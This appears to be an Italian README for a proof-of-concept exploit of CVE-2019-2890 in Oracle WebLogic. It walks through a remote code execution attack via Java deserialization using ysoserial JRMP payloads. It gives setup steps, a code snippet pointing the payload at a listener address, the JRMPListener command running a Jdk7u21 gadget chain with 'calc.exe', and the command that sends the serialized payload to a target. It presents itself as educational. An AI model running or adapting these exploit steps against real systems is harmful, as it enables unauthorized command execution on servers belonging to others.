
Exploit PoC per CVE-2019-2890 che prende di mira Oracle WebLogic, utilizzando payload JRMP di ysoserial per l'esecuzione remota di comandi tramite deserializzazione di oggetti serializzati.
Solo per uso didattico e di scambio. L'uso per altri scopi è a proprio rischio.
I file jar pertinenti sono già stati importati nel progetto e il metodo di sfruttamento utilizza yso con JRMP. Durante l'apprendimento e il debug, è possibile modificare il metodo di sfruttamento.
Per prima cosa, è necessario posizionare il file SerializedSystemIni.dat da weblogic nella cartella security.
Quindi, è necessario rinominare yso in ysoserial.jar e importarlo nella directory lib.

In secondo luogo, l'indirizzo IP e la porta in getObject in weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Infine, in remoto, tramite l'ascolto JRMP, sfruttare il comando 7u21 per eseguire.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Metodo di utilizzo: eseguire Poc.java per generare il file serializzato poc.ser, quindi tramite
python weblogic.py ip port poc.ser

